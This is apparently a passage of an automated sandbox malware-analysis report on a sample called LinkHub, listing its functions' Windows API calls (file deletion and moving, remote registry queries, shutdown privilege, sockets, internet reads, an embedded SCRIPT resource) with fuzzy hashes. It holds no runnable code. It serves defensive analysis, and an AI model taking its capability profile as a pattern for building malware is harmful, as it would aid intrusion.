                                                                    • Instruction ID: 0b03e1b6380cbd1d1b53edaf9292ce589a3b230cd3892affdc6286aa30a4cf7c
                                                                    • Opcode Fuzzy Hash: 40662283ad4d7f04e0fce88dc7a772d65ed339e74f27e1cf6aa3ee94c3fa87d1
                                                                    • Instruction Fuzzy Hash: 74D16172928344AEC314EF64C845EAFB7ECAF88704F44091DF585D7292EB74DA54CB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BA0A8
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002BA0E6
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 002BA100
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BA118
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA123
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BA13F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BA18F
                                                                    • SetCurrentDirectoryW.KERNEL32(00307B94), ref: 002BA1AD
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BA1B7
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA1C4
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA1D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 9280377d1a043c36398fa2f818e872d8af4079237a062f1fa53925ffdd147305
                                                                    • Instruction ID: af010c71dc2387eb2997dc141ea44d01f114ba382b27bc52da2d26ba89f621b9
                                                                    • Opcode Fuzzy Hash: 9280377d1a043c36398fa2f818e872d8af4079237a062f1fa53925ffdd147305
                                                                    • Instruction Fuzzy Hash: EC31093192161A6BDB50AFB8EC4DADE77AC9F053A0F100096F819D30D0EB70DE958E65
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 002B4785
                                                                    • _wcslen.LIBCMT ref: 002B47B2
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002B47E2
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 002B4803
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 002B4813
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 002B489A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002B48A5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 002B48B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 1149970189-3457252023
                                                                    • Opcode ID: bd62d6d615dfd0f0da7541fa83b978b029ebff6c88e50d05ef6f5f7ffd7a09fe
                                                                    • Instruction ID: 32b412fbe9eb2c8cc76699cce02ec5f26e0585159c99013890a3777472e1d5aa
                                                                    • Opcode Fuzzy Hash: bd62d6d615dfd0f0da7541fa83b978b029ebff6c88e50d05ef6f5f7ffd7a09fe
                                                                    • Instruction Fuzzy Hash: 6231B67591014AABDB21AFA0DC89FEB37BCEF89740F1041B6F509D2061E7709A94CB24
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 002BA203
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 002BA25E
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA269
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 002BA285
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BA2D5
                                                                    • SetCurrentDirectoryW.KERNEL32(00307B94), ref: 002BA2F3
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BA2FD
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA30A
                                                                    • FindClose.KERNEL32(00000000), ref: 002BA31A
                                                                      • Part of subcall function 002AE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002AE3B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: b36a277232dba4604a989ba4546aeb86de864319eeec024d55ba2120c9a91a70
                                                                    • Instruction ID: 05d38747ee87e07a1d3031ae8a868652e10dd088b14c67e456f43fc195740ec7
                                                                    • Opcode Fuzzy Hash: b36a277232dba4604a989ba4546aeb86de864319eeec024d55ba2120c9a91a70
                                                                    • Instruction Fuzzy Hash: BB31F23191161A6BCF20AFB4EC4DADE77ACAF453A4F104192F811A31D0DB71DEA5CE61
                                                                    APIs
                                                                      • Part of subcall function 002CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CC10E,?,?), ref: 002CD415
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD451
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4C8
                                                                      • Part of subcall function 002CD3F8: _wcslen.LIBCMT ref: 002CD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002CC99E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 002CCA09
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CCA2D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002CCA8C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002CCB47
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002CCBB4
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002CCC49
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 002CCC9A
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 002CCD43
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 002CCDE2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 002CCDEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3102970594-0
                                                                    • Opcode ID: fab5fd9bb0bae47c70b86d40d4a90b4b07ad1dacc15f6820ec7b82c9f432ecd2
                                                                    • Instruction ID: a916020ddb7ceae88267606d3d32045d5abb6232e7a1e984a74873fbc47eaaa0
                                                                    • Opcode Fuzzy Hash: fab5fd9bb0bae47c70b86d40d4a90b4b07ad1dacc15f6820ec7b82c9f432ecd2
                                                                    • Instruction Fuzzy Hash: EE026E71614201AFC714DF24C895F2ABBE5EF89314F1885ADF84ACB2A2CB31ED56CB51
                                                                    APIs
                                                                      • Part of subcall function 00245851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002455D1,?,?,00284B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00245871
                                                                      • Part of subcall function 002AEAB0: GetFileAttributesW.KERNEL32(?,002AD840), ref: 002AEAB1
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 002AD9CD
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 002ADA88
                                                                    • MoveFileW.KERNEL32(?,?), ref: 002ADA9B
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 002ADAB8
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 002ADAE2
                                                                      • Part of subcall function 002ADB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,002ADAC7,?,?), ref: 002ADB5D
                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 002ADAFE
                                                                    • FindClose.KERNEL32(00000000), ref: 002ADB0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 1946585618-1173974218
                                                                    • Opcode ID: 5acced4009d996ec969f48d2a45e0d9c53ce0b7b6315b54e55e8393116dd2f7f
                                                                    • Instruction ID: f49945a65e94eedfea249da9f7e3bc22b52aa5c48dd2a543b271b316678296c8
                                                                    • Opcode Fuzzy Hash: 5acced4009d996ec969f48d2a45e0d9c53ce0b7b6315b54e55e8393116dd2f7f
                                                                    • Instruction Fuzzy Hash: 6E612931C1110AABCF06EFA0D9969EDB7B5AF15304F6040A5E40677196EF31AF19CF61
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: d0fe14fd2249ca150bbaa3fdbf4d743400cd6911c7a67625f6f406c7335c0b4f
                                                                    • Instruction ID: 39201d42eaae835cbe9d4ca19883a64762a652279d64edc184233b53106df0f0
                                                                    • Opcode Fuzzy Hash: d0fe14fd2249ca150bbaa3fdbf4d743400cd6911c7a67625f6f406c7335c0b4f
                                                                    • Instruction Fuzzy Hash: 8941A030A15A02AFE714CF25E98CB55BBE4FF44358F15C4A9E8198B662C735EC51CBD0
                                                                    APIs
                                                                      • Part of subcall function 002A2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A205A
                                                                      • Part of subcall function 002A2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A2087
                                                                      • Part of subcall function 002A2010: GetLastError.KERNEL32 ref: 002A2097
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 002AF249
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-3163812486
                                                                    • Opcode ID: b7f6874de8446695ace33e679d826ffd6dd6307cd6572a254e1cd33c53ff572d
                                                                    • Instruction ID: 732d29e55d7f5c0976dea98119ab914d3772d2f5bcb178d4a83771e119f4c1a2
                                                                    • Opcode Fuzzy Hash: b7f6874de8446695ace33e679d826ffd6dd6307cd6572a254e1cd33c53ff572d
                                                                    • Instruction Fuzzy Hash: 4001497AA312116BEB6426F8AE8AFBF736C9F0A340F104531FD03E20D2DE685C249590
                                                                    APIs
                                                                    • DefDlgProcW.USER32(?,?), ref: 0024233E
                                                                    • GetSysColor.USER32(0000000F), ref: 00242421
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00242434
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Proc
                                                                    • String ID: (1
                                                                    • API String ID: 929743424-3903994380
                                                                    • Opcode ID: beb55c00b81ec2b978e489c1955fd573fcc62a2ab50b7879c92d3bede2cde9c6
                                                                    • Instruction ID: 3be4c9651bfbf0fa7f44ff39790e639d5beb74bf4d11488f945d0ab8822d96d9
                                                                    • Opcode Fuzzy Hash: beb55c00b81ec2b978e489c1955fd573fcc62a2ab50b7879c92d3bede2cde9c6
                                                                    • Instruction Fuzzy Hash: 738127B4135401FDE22DBE3E8C98E7F296EEB42700F51018AF102C66D5C999CE769776
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002856C2,?,?,00000000,00000000), ref: 002B3A1E
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,002856C2,?,?,00000000,00000000), ref: 002B3A35
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,002856C2,?,?,00000000,00000000,?,?,?,?,?,?,002466CE), ref: 002B3A45
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,002856C2,?,?,00000000,00000000,?,?,?,?,?,?,002466CE), ref: 002B3A56
                                                                    • LockResource.KERNEL32(002856C2,?,?,002856C2,?,?,00000000,00000000,?,?,?,?,?,?,002466CE,?), ref: 002B3A65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: ddd6b000c827273bc27db404756c7c62b5cdfa905eccf23f102911d0dc73ee3e
                                                                    • Instruction ID: 12706f9c56dd9b5f281d941cb72714952b069e8cd54aaa96ce4f5767d3cb4b69
                                                                    • Opcode Fuzzy Hash: ddd6b000c827273bc27db404756c7c62b5cdfa905eccf23f102911d0dc73ee3e
                                                                    • Instruction Fuzzy Hash: B2114870601601ABE7218F65EC48F677BB9EBC5B40F24426DB44296290DB61ED018670
                                                                    APIs
                                                                      • Part of subcall function 002A1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002A1916
                                                                      • Part of subcall function 002A1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002A1922
                                                                      • Part of subcall function 002A1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002A1931
                                                                      • Part of subcall function 002A1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002A1938
                                                                      • Part of subcall function 002A1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002A194E
                                                                    • GetLengthSid.ADVAPI32(?,00000000,002A1C81), ref: 002A20FB
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002A2107
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 002A210E
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 002A2127
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,002A1C81), ref: 002A213B
                                                                    • HeapFree.KERNEL32(00000000), ref: 002A2142
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                    • String ID:
                                                                    • API String ID: 3008561057-0
                                                                    • Opcode ID: 3e331a017d5f6ca7b34e08a1a53b76cfa76c4e7ab342f50db16cd1e030463114
                                                                    • Instruction ID: c7a6b81e9fcc34f7a0bf70970c5ddc639f21030bf7cfc3b3b21bc72c796d7606
                                                                    • Opcode Fuzzy Hash: 3e331a017d5f6ca7b34e08a1a53b76cfa76c4e7ab342f50db16cd1e030463114
                                                                    • Instruction Fuzzy Hash: 1D110071A21606FFDF108F68DC08BAF7BB9EF42356F108059E94993120CB31AD18CB60
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 002BA5BD
                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 002BA6D0
                                                                      • Part of subcall function 002B42B9: GetInputState.USER32 ref: 002B4310
                                                                      • Part of subcall function 002B42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002B43AB
                                                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 002BA5ED
                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 002BA6BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                    • String ID: *.*
                                                                    • API String ID: 1972594611-438819550
                                                                    • Opcode ID: 6a5b9ca4c65584943d4968e5bb817eec1638749c8b6a3ee81459872f99adc873
                                                                    • Instruction ID: b38be50a55d177f99ccd311f2455ea4d032b90f1a5e7fcc30a16cdd42527ebca
                                                                    • Opcode Fuzzy Hash: 6a5b9ca4c65584943d4968e5bb817eec1638749c8b6a3ee81459872f99adc873
                                                                    • Instruction Fuzzy Hash: 984164B1D2120AAFCF15DF64CC4AAEEBBB8EF05350F644056E805A3191EB719E64CF61
                                                                    APIs
                                                                      • Part of subcall function 002C3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 002C3AD7
                                                                      • Part of subcall function 002C3AAB: _wcslen.LIBCMT ref: 002C3AF8
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C22BA
                                                                    • WSAGetLastError.WSOCK32 ref: 002C22E1
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 002C2338
                                                                    • WSAGetLastError.WSOCK32 ref: 002C2343
                                                                    • closesocket.WSOCK32(00000000), ref: 002C2372
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 1601658205-0
                                                                    • Opcode ID: d5191fc9ab192e34ef121d4f17717148529f4668a7f4c85ac732acb3f6ec86f4
                                                                    • Instruction ID: b0b4d69ffb49ef80975a84dbda8853d74495ef0b125d12cce49aa75ffa68f718
                                                                    • Opcode Fuzzy Hash: d5191fc9ab192e34ef121d4f17717148529f4668a7f4c85ac732acb3f6ec86f4
                                                                    • Instruction Fuzzy Hash: 2D51C371A10200AFE715EF24C886F2A77E9AB45714F04819CF9459F3C3CB71AD528BE1
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: f731f9df7baa8ebe01b1ffdc066cc41ab2c0d981eb38d90a0d625b15723f1369
                                                                    • Instruction ID: 580c816d1b434b24e39d00286a57ec50e477b833d415abe64247b1b8d101bb5b
                                                                    • Opcode Fuzzy Hash: f731f9df7baa8ebe01b1ffdc066cc41ab2c0d981eb38d90a0d625b15723f1369
                                                                    • Instruction Fuzzy Hash: 11212431B11211CFF7219F26D844B1ABBE8FFA5310F19806AE8498B351C771EC56CB90
                                                                    APIs
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 002BD8CE
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002BD92F
                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 002BD943
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                    • String ID:
                                                                    • API String ID: 234945975-0
                                                                    • Opcode ID: 5b50f85511312cacbf310412997afcc294afcd35434ad87be1d9444017656d0b
